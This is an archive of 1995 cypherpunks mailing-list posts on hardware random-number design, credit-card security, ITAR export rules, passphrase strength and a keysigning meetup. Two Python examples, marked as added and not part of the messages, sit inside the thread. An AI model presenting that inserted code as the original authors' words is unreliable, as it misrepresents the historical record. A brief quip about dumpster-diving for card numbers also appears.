   This is not a flaw or a feature. If you download a helper
app off the internet that has a flaw, it's not a flaw in the 
browser. Claiming that it is is like claiming that
"ftp" or "nfs" has a fatal flaw because it allows you to execute
untrusted binaries from other computers. Helper apps are in
the category of third party add-ons and the responsibility for
their correct implementation rests on the companies which sell them.
Netscape never claimed the ability to allow users to download
executable binary applications from the net and run them without
risk. Netscape doesn't come with a postscript interpreter nor does
it have one configured by default, so if the user installs one
and configures it, and it has a security flaw, it's not Netscape's
fault. Installing helper apps is not "easy" compared with
clicking on a Java applet so any user who does it must at least be
somewhat knowledgeable.

   If a postscript interpreter is implemented in JDK Beta, and
it is insecure and it is allowed to interpret postscript files,
nothing bad will happen.

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen.  My compliments for that.

   They've never demonstrated otherwise in my entire history on the Java
mailing lists. Their whole mission is to produce a secure environment
for executing untrusted applications. The alpha's and beta's  of
every product have problems, it's to be expected. The whole point
of releasing a beta is so that you can get feedback.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 15 Nov 1995 17:45:57 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto requlations & laws
Message-ID: <MAILQUEUE-101.951115103109.320@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Could the person posting the location of the crypto laws please repost.
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Bert-Jaap Koops




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 16 Nov 1995 03:15:15 +0800
To: cypherpunks@toad.com
Subject: Re: Hardware-random-bits interface
Message-ID: <accf76ef010210049425@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:17 PM 11/15/95, David K. Merriman wrote:
>At 02:31 PM 11/14/95 -0800, you wrote:
>>I've been thinking about physically random bits recently, so
>>I'd like to offer a simple, easily implementable interface to a
>>source of such bits, along with a design sketch using a common
>>radio receiver chip as the noise source.
>
>It sounds like a fairly decent idea, _as long as you shield the bejeebers
>(technical term :-) out of it_. Otherwise, anybody with a signal generator
>could skew your numbers however they saw fit: any component lead can act as
>an antenna, no matter how small that lead is.

But if you "shield the bejeebers out of it," then all the radio receiver
generates is whatever signal manages to sneak through--which, ironically,
would make it _easier_ for an outside attacker to drive--and some amount of
internal receiver/amplifier noise, such as the Johnson noise talked about
here. (Every receiver has an "equivalent noise temperature," recall.)

And if one is left with only internal noise, why not simply use a nice
clean source like a Zener diode?


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 16 Nov 1995 01:53:41 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511150512.VAA08514@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.90.951115111136.26369B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Obviously you never jumped in the garbage bin of a restaurant looking for cc's.
Yeah give it to one person... sure.....

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 14 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> Actually, this is not quite correct.  There is a difference if I give a
> credit card to *one* person, or if I give the message containing that
> number to a chain of twenty or thirty strangers to get my information to
> the one person I want to have that information. 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 03:12:24 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Hardware-random-bits interface
Message-ID: <m0tFmLF-000912C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source.  The interface consists
>of two bits in the standard PC parallel port, one serving as
>the data line and the other the sampling clock.
[stuff deleted]

>  Device probing:  the device should somehow identify itself
>    as a random bit generator.  One way to do this is to wire
>    one of the parallel port data bits to a status line; for
>    example, data bit 0 (pin 2) could be wired to status bit 5
>    (pin 12).  Software can then twiddle the data bit and
>    watch for the response.

I'm not a crypto expert, or a mathematician, or anything like that, but I
think I have a few suggestions that you should consider.

1.  DON'T let the random-number generator "know" that it is being accessed,
even with something as simple as a clock.  The reason is that if it became
important enough, an agency with a BIG BUDGET could make a custom chip that
implemented the same apparently-random function, (but might really be a
10**18 state machine with, say, only 10**6 starting positions) but could be
"alerted" and reset by a specific pattern of external accesses, possibly
activated by a special-purpose virus.

The resulting "fake" chip would appear to result in random output, if never
reset, but would produce a data stream with a predictable series with a
limited number of starting points.

2.  Since the main goal of the project is to have this end up being an
ECONOMICAL board, you'll probably end up with a data stream which has some
sort of slight bias in one direction or another.  As far as I can see,
that's okay, because it merely means that you're getting somewhat less than
one bit of randomness with each accessed bit.  But as I understand it, the
solution to this is to combine the bits in software so that you end up with
fewer bits.  While it's been months since I've read Schneier's book, I
recall that it talked about extracting more-perfectly-randomized bits from a
larger collection of not-quite-so-randomized ones.

3.  In addition, for most trustworthy results, I think you should XOR the
resulting data with a long-period pseudorandom stream of bits derived and
modified from some reasonably random inputs, such as keystroke timings and
free-running-system-clock bits.  The reason is that (as far as this neophyte
knows)  a stream of GOOD randomized numbers XOR'ed with a stream of
reasonably randomized numbers results in a stream at least as randomized as
the better source.  More importantly, such a procedure should help deter any
attempt to corrupt the physically-random source, because even going to that
trouble of subverting it they'd defeat only one stage in the process.

4.  I think the user should be given the option of socketing the IC's.
True, that would make it easier for an interloper to replace, but it would
also allow the user to quickly swap the critical chips, possibly at
intervals of a few days to a few weeks, to partially guard against sabotage.

5.  The whole assemblage should be able to be stored in a package sealed
with evidence tape.
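
Added example, not part of the message above: a Python simulation of points 2 and 3, with von Neumann pair debiasing standing in for the bit-combining step (the post names no specific method) and the result XORed with a software stream. The source model, the SHA-256 counter-mode stream, the seed bytes and the yield threshold are assumptions of this example.

```python
import hashlib
import random


def biased_source(n, p_one, seed):
    """Constructed stand-in for the board: n independent bits, P(1) = p_one."""
    rng = random.Random(seed)
    return [1 if rng.random() < p_one else 0 for _ in range(n)]


def von_neumann(bits):
    """Point 2: trade quantity for quality.

    Non-overlapping pairs: 01 -> 0, 10 -> 1, 00 and 11 are dropped.
    This removes bias only if the input bits are independent of each other.
    """
    return [a for a, b in zip(bits[0::2], bits[1::2]) if a != b]


def software_stream(seed_material, n):
    """Point 3: pseudorandom bits derived from other inputs.

    SHA-256 in counter mode is this example's choice, not the post's.
    """
    out = []
    counter = 0
    while len(out) < n:
        block = hashlib.sha256(seed_material + counter.to_bytes(8, "big")).digest()
        for byte in block:
            out.extend((byte >> i) & 1 for i in range(8))
        counter += 1
    return out[:n]


def xor_streams(a, b):
    return [x ^ y for x, y in zip(a, b)]


def ones_fraction(bits):
    return sum(bits) / len(bits) if bits else 0.0


def condition(raw_bits, seed_material, min_yield=0.05):
    """Debias the hardware bits, reject a source that looks dead, then XOR.

    min_yield is an assumed threshold: the fraction of input pairs that
    must survive debiasing. A stuck line yields nothing and is rejected.
    """
    debiased = von_neumann(raw_bits)
    pairs = len(raw_bits) // 2
    if pairs == 0 or len(debiased) / pairs < min_yield:
        raise ValueError("hardware source yields too few bits; stuck or replaced?")
    return xor_streams(debiased, software_stream(seed_material, len(debiased)))


if __name__ == "__main__":
    # Constructed seed material standing in for keystroke timings.
    SEED = b"constructed sample: keystroke gaps 113,87,240,95,131 ms"

    raw = biased_source(200_000, 0.70, seed=1)
    debiased = von_neumann(raw)
    print(f"raw:      {len(raw):6d} bits, ones = {ones_fraction(raw):.3f}")
    print(f"debiased: {len(debiased):6d} bits, ones = {ones_fraction(debiased):.3f}")

    out = condition(raw, SEED)
    print(f"combined: {len(out):6d} bits, ones = {ones_fraction(out):.3f}")

    # A source replaced by a fixed repeating pattern passes the yield check,
    # but the XOR stage still hides it from anyone without the seed material.
    pattern = [0, 1, 1, 0] * 50_000
    out = condition(pattern, SEED)
    print(f"pattern source after XOR: ones = {ones_fraction(out):.3f}")

    try:
        condition([0] * 1000, SEED)
    except ValueError as err:
        print("stuck source:", err)
```

The debiasing step discards well over half the raw bits at a 70/30 bias, which is the "somewhat less than one bit of randomness with each accessed bit" cost the post describes.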





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 16 Nov 1995 03:45:37 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <Pine.HPP.3.91.951115112428.20058C-100000@hawk.twinds.com>
Message-ID: <199511151924.LAA29261@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Arley Carter <ac@hawk.twinds.com>

>This may be a stupidly obvious question but..... 
>We could argue until the cows come home, hell freezes over or the Cubs win
>the World Series, what ever comes first ;-) about whether giving your credit
>card number to a waiter or an 800 # clerk is any more or less secure than
>transmitting it encrypted or clear text over a data link.
>

the point of my post was that I AGREE. the only issue is that we should
make internet security as superior as possible regardless of the security
of credit cards in the real world. I was attacking the line of thought
that goes, "credit card security is already marginal, therefore why 
should anyone try to improve it in cyberspace"? this is circular
reasoning. "why should anyone try to make something more secure when
it is already insecure?"

>
>I have seen no such statement from the Visa/MasterCard/bank consortiums
>regarding who is at risk if my card number is stolen and used in cyberspace.
>When I get a written indemnification from them stating clearly that 
>using my credit card in cyberspace is no different from using in a local
>restaurant, then I see no risk to the user in using the card in cyberspace.

a major point of my post was that even if you think the cost of fraud
is invisible to you, it is not. it is in everyone's interest to reduce
fraud. if you think you are not paying for it now, you are believing
in an illusion. reducing fraud rates will decrease costs for everyone
in the long run. it is true that credit card companies try to localize
the costs to the areas where their risk is higher (for example, higher
interest rates on credit risks, different charges to the merchant
for "card present" vs. "card not present" as indicated by the other 
poster), however I still think it is obvious that these costs are
still distributed over all customers.

this is one of the main illusions I was trying to discredit in my
original post. the thinking goes like this: "so-and-so does not
appear to have any effect on me now, therefore to consider it is
irrelevant." in the case of credit card users, they seem to think,
"I can already cancel any transactions. illicit purchases made when
somebody steals my card in cyberspace are no different". another
line of thinking is, "credit cards are already insecure, so who
cares if people steal them over the internet". all of these are
very specious lines of thought. your own line is, familiarly,
"nothing matters unless it shows up on my own credit card bill" is
again in my opinion an invitation to disaster. you are paying for
the insecurity of credit cards right now, if not to your credit
card company then in slightly increased rates in the goods you buy
(to cover the merchant's cost to the credit card company).

>The risk to the bank and merchant.......Now that is a different matter.
>Credit card usage on the net will never take off until this issue is
>solved to the satisfaction of the bank and the user.  Until this happens
>arguing this issue is like arguing about how many angels can fit on the 
>head of a pin.

part of getting to the point of satisfaction of the bank and user is
improved internet security. another point of my post.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 16 Nov 1995 04:16:53 +0800
To: cypherpunks@toad.com
Subject: Re: Hardware-random-bits interface
In-Reply-To: <199511151905.OAA08439@jekyll.piermont.com>
Message-ID: <199511152003.MAA03762@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > And if one is left with only internal noise, why not simply use a nice
> > clean source like a Zener diode?
> 
> Quite solidly agreed. Internal noise beats external noise, and there
> is no point in using a radio receiver when what you want is internal
> noise.

It may have been misleading to refer to a radio receiver chip:  the
noise generated by the chip will be entirely internal.  It doesn't
depend on any external signal "sneaking in"; the noise comes from
the effective resistance of the first amplifier stage.  Nothing
is being "received", in some sense; it's just a big hunk 'o gain.

A Zener diode would be fine, but the design is a bit more complex,
especially for wide bandwidths---you need to mess with biasing
voltages, speedy op-amps, interface to CMOS, and all that jazz.
You'd need external power (or a DC-DC converter).  I wanted a
super-simple design that people could just plonk down on a PC
board.  Two chips and some bypass capacitors.

Peter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 16:03:02 +0800
To: cypherpunks@toad.com
Subject: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v02120d03accfcdbea466@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




As a result of my temporary notoriety as OpenDoc Futurist(tm) ;-), I've
heard about something called an OpenDoc Kitchen, which is a periodic hack
fest put on by Apple for developers of OpenDoc parts where code is actually
written.

My understanding is that this will be held at Apple, in Cupertino, in early
December.

They are especially interested in anyone from Digicash who would like to
make a digital cash OpenDoc component for Cyberdog, because I've been
ranting to them about this picture in my head of someone dragging digital
cash icons onto a register icon in a web browser to pay for a purchase.  I
expect that *any* digital cash part, even some kind of bashing of the
current Mac ecash client into an OpenDoc part, would be cool by them as a
first start.

In addition, it seems to me that we may be close enough with MacPGP 3.0 to
play with it at the component level, but maybe not...


If you're interested, e-mail me, and I'll put you in touch with the right
people.  Now, the invitations have already been sent and RSVP'd on this, so
we'd be coming in through the back door. Obviously, we're looking to put
the best foot forward, as they are just about to the point of believing my
mantra of "digital commerce *is* financial cryptography".

I'm hoping to go, if there's something to do. I couldn't code my way out of
a paper bag, but like the immortal Chauncey Gardener, "I like to watch."
;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 02:15:22 +0800
To: cypherpunks@toad.com
Subject: DCSB: "A Middleware Guy Looks at Issues in Digital Commerce"
Message-ID: <v02120d08accfd5a980c7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                               Rich Salz
                        Open Software Foundation

           "A Middleware Guy Looks at Issues in Digital Commerce"


                        Tuesday, December 5, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Rich has been with OSF for nearly four years, where he has been
the technical lead of the OSF DCE 1.1 and 1.2 releases.  He is
also helping write the secure multi-threaded WWW server for the
DCE-Web project.  He has been active in Usenet, and is the author
of INN, one of the most popular Usenet/NNTP implementations.
His home page is http://www.osf.org/~rsalz.

Rich says:

>In the rush to separate lift even more money out of your wallet
>-- sorry, to provide consumers with more choice and opportunity
>-- the electronic commerce community has largely been ignoring
>issues that the distributed systems field has been trying to
>address for years.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, December 5, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
December 2 (that's two weeks from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.


January's speaker will be Art Hutchinson of Northeast Consulting Resources,
Inc.

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the BSDC Program Committee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info bsdc" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the BSDC e-mail list, send "subscribe bsdc" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 16 Nov 1995 03:32:09 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <m0tFUJh-00091rC@pacifier.com>
Message-ID: <199511151908.OAA05536@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>(1), (2), (3), (4) and (5) of this category;"
>
>Question:  What makes computers in general NOT describable by such a
>paragraph?!?

The referenced paragraphs describe cryptographic hardware, software and
technical data.  Computers in general are not "specifically designed"
as cryptographic equipment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 16 Nov 1995 02:51:47 +0800
To: cypherpunks@toad.com
Subject: So. FL Cypherpunks Keysigning/Party
Message-ID: <199511151832.NAA33898@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greetings South Florida cypherpunks--

        All cypherpunks in or near Dade county who wish to meet will be
getting together at 7:30PM on Wednesday, November 29th. In keeping with
past South Florida cypherpunks tradition, we are going to meet where the
_beer_ is, and (better yet!) this South Florida cypherpunks meeting will
coincide with the monthly meeting of the Miami Area Society of Homebrewers
("M.A.S.H.") at the Abbey Brewing Company on Miami Beach. This bar serves
a selection of barsnacks, not quite as extensive as the food at The
Riverwalk Brewery, but at least they aren't going out of business...

Location:
The Abbey Brewing Company  (305) 538-8110
1115 16th Street, Miami Beach

Directions:
[From North: Take I-95 South to 195 exit, over to the beach, and go South
on Alton Road. Look for a green sign that says "BAR" atop the building.]
[From South: Take I-95 North to 395 exit, over to the beach, and go North
on Alton Road. Look for a green sign that says "BAR" atop the building.]

        I will be bringing the videotape of the "Mitchells In The Morning"
talkshow featuring PRZ that I mentioned a while ago, but The Abbey has no
VCR, and the atmosphere might not be right for a showing.
        Because the meeting is on Miami Beach, folks from far away are
urged to carpool or use Tri-rail to Metrorail and then get a ride from
Jim Ray (I will try to stay *somewhat* sober). e-mail <liberty@gate.net>
for ride or carpool details & I'll try to coordinate the transportation
aspect of the meeting for those in need of a ride.
        Joe Block <jpb@miamisci.org> is willing to coordinate the
keysigning aspect of the meeting, and he will post in a few days.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"...the politicians have been arguing over whether to increase the
   budget enormously or just hugely. The news media refer to this
   process as 'cutting' the budget." -- Dave Barry

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 16 Nov 1995 03:29:28 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Hardware-random-bits interface
In-Reply-To: <accf76ef010210049425@[205.199.118.202]>
Message-ID: <199511151905.OAA08439@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> But if you "shield the bejeebers out of it," then all the radio receiver
> generates is whatever signal manages to sneak through--which, ironically,
> would make it _easier_ for an outside attacker to drive--and some amount of
> internal receiver/amplifier noise, such as the Johnson noise talked about
> here. (Every receiver has an "equivalent noise temperature," recall.)
> 
> And if one is left with only internal noise, why not simply use a nice
> clean source like a Zener diode?

Quite solidly agreed. Internal noise beats external noise, and there
is no point in using a radio receiver when what you want is internal
noise.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 16 Nov 1995 06:51:35 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511152225.OAA07154@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>Does anyone know the ostensible justification for this?  

Isn't the NCSA government-funded?  If so, they've probably got
less slack in what they can get away with than private citizens;
the NSA's got more leverage over their funding, especially if
"Supercomputer Applications" are often military or civilian-govt.
Not only do they have to worry about ITAR as law, they have to
worry about their continued cash flow.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 16 Nov 1995 06:50:48 +0800
To: cypherpunks@toad.com
Subject: Re: Repeated Words/characters in Password/Phrase
Message-ID: <199511152225.OAA07177@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words?  And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this.  Thanks.

As always, it depends on the attacks people can make on your system.
For Unix password files, the cyphertext is often available, the plaintext
is known, and the key (your password) is known to be eight or fewer
characters.  If there's reasonable suspicion that your password contains
multiples of one or more characters, and that they're mostly letters,
you're toast against a good brute-force attack, because the search space
is fairly small.  Using, say, a pair of 4-letter words is an even worse
idea...

For PGP passphrases, the cyphertext is generally unavailable, but assuming
you're dealing with Bad Guys resourceful enough to try to crack your
passphrase, they've probably got the file.  The plaintext may be partially
known (PGP data files have some structure; RTFM to find out how much) and
partially unknown (your secret key) but guesses can be validated (slowly).
The structure of the IDEA key is that your passphrase is hashed by MD5, and
the 128-bit output used as an IDEA key to encrypt the formatted secret key.
Since brute-forcing IDEA with the 128-bit MD5 output is unrealistic, the
alternative is to feed candidate keys through the whole process.  So how
much entropy does your passphrase have, and how many guesses are they
willing to attempt?  How much does word-repeating affect it?  How much
entropy depends on your taste in passphrases, your creativity, and how much
you're willing/able to memorize without resorting to writing it down.

The MD5 effectively limits entropy to 128 bits, but you can cram as much as
you want into the passphrase and MD5 will crunch it all down, so repeated
words can only cause problems if they make you decide you've got enough
entropy in the passphrase before you do.  If your passphrase is "FOO BAR",
and you're known to be a programmer, lengthening it to "FOO FOO BAR BAR BAR
Skidoo" may improve it some, though it's not as good as "Eric Woodruff
Kintetsu Espada 1145 Lutheran", to pick six words drawn randomly from the
Tri-Valley phone book.  But if you eliminate obvious material, and
word-doubling lets you pick a more complex passphrase than you might have
otherwise used, go ahead - it's not going to make the MD5 any more
attackable.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
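
Added example, not part of the message above: a Python sketch that derives the 128-bit key the way the message describes (MD5 of the passphrase) and compares the message's three passphrases under a naive word count and under a guesser that knows words may be repeated. The dictionary size (65,536 words), the maximum repeat count (4), the UTF-8 encoding and all function names are assumptions of this example.

```python
import hashlib
import math
from itertools import groupby

DICTIONARY_SIZE = 65536   # assumed number of candidate words
MAX_REPEAT = 4            # assumed: each word is typed 1 to 4 times in a row
MD5_BITS = 128            # size of the MD5 output used as the IDEA key


def idea_key_from_passphrase(passphrase):
    """MD5 of the passphrase; the 16-byte digest is the IDEA key."""
    return hashlib.md5(passphrase.encode("utf-8")).digest()


def word_runs(passphrase):
    """Collapse consecutive repeats: 'FOO FOO BAR' -> [('FOO', 2), ('BAR', 1)]."""
    return [(word, len(list(group))) for word, group in groupby(passphrase.split())]


def naive_bits(passphrase, dictionary_size=DICTIONARY_SIZE):
    """Estimate that treats every typed word as an independent random pick."""
    return len(passphrase.split()) * math.log2(dictionary_size)


def repeat_aware_bits(passphrase, dictionary_size=DICTIONARY_SIZE,
                      max_repeat=MAX_REPEAT):
    """Search space for a guesser who tries 'word, repeated 1..R times'.

    Each run costs log2(dictionary) + log2(R) bits. This is an upper bound:
    guessable words such as FOO and BAR are worth far less than a random pick.
    """
    runs = word_runs(passphrase)
    longest = max((count for _, count in runs), default=1)
    per_run = math.log2(dictionary_size) + math.log2(max(max_repeat, longest))
    return len(runs) * per_run


def effective_bits(bits):
    """The MD5 step caps whatever the passphrase holds at 128 bits."""
    return min(bits, MD5_BITS)


def unix_password_space(alphabet_size, max_len=8):
    """Number of passwords of 1..max_len characters over the alphabet."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    # The three passphrases are the ones quoted in the message.
    phrases = [
        "FOO BAR",
        "FOO FOO BAR BAR BAR Skidoo",
        "Eric Woodruff Kintetsu Espada 1145 Lutheran",
    ]
    for phrase in phrases:
        key = idea_key_from_passphrase(phrase)
        print(f"{phrase!r}")
        print(f"  key bytes: {len(key)}  naive: {naive_bits(phrase):.0f} bits  "
              f"repeat-aware: {effective_bits(repeat_aware_bits(phrase)):.0f} bits")

    letters = math.log2(unix_password_space(26))
    printable = math.log2(unix_password_space(95))
    print(f"Unix password, letters only, up to 8 chars: {letters:.1f} bits")
    print(f"Unix password, 95 printable, up to 8 chars: {printable:.1f} bits")
```

Both six-token passphrases score the same under the naive count; only the repeat-aware estimate separates them, and every passphrase yields a 16-byte key regardless of its length.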






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:13:15 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFpbT-0008yaC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>jim bell writes:
>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>(1), (2), (3), (4) and (5) of this category;"
>>
>>Question:  What makes computers in general NOT describable by such a
>>paragraph?!?
>
>The referenced paragraphs describe cryptographic hardware, software and
>technical data.  Computers in general are not "specifically designed"
>as cryptographic equipment.

Great!  Then you must merely ensure that there is at least one
(non-encryption) program around that can use the same hooks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Date: Thu, 16 Nov 1995 04:13:40 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <199511151943.OAA01845@blue.seas.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why 
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
> 

	Precisely.  It reminds me of a talk given by Dr. John McQuilan
(I think it was at one of his High Performance Networks Conferences) where
he said that the big administrative headache for high speed networks vs.
low speed networks was simply the speed with which you could get in 
trouble.....  The analogy holds quite true in physical credit cards vs.
net credit....

------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:28:27 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Hardware-random-bits interface
Message-ID: <m0tFpnk-0008yDC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > And if one is left with only internal noise, why not simply use a nice
>> > clean source like a Zener diode?
>> 
>> Quite solidly agreed. Internal noise beats external noise, and there
>> is no point in using a radio receiver when what you want is internal
>> noise.
>
>It may have been misleading to refer to a radio receiver chip:  the
>noise generated by the chip will be entirely internal.  It doesn't
>depend on any external signal "sneaking in"; the noise comes from
>the effective resistance of the first amplifier stage.  Nothing
>is being "received", in some sense; it's just a big hunk 'o gain.
>
>A Zener diode would be fine, but the design is a bit more complex,
>especially for wide bandwidths---you need to mess with biasing
>voltages, speedy op-amps, interface to CMOS, and all that jazz.
>You'd need external power (or a DC-DC converter).  I wanted a
>super-simple design that people could just plonk down on a PC
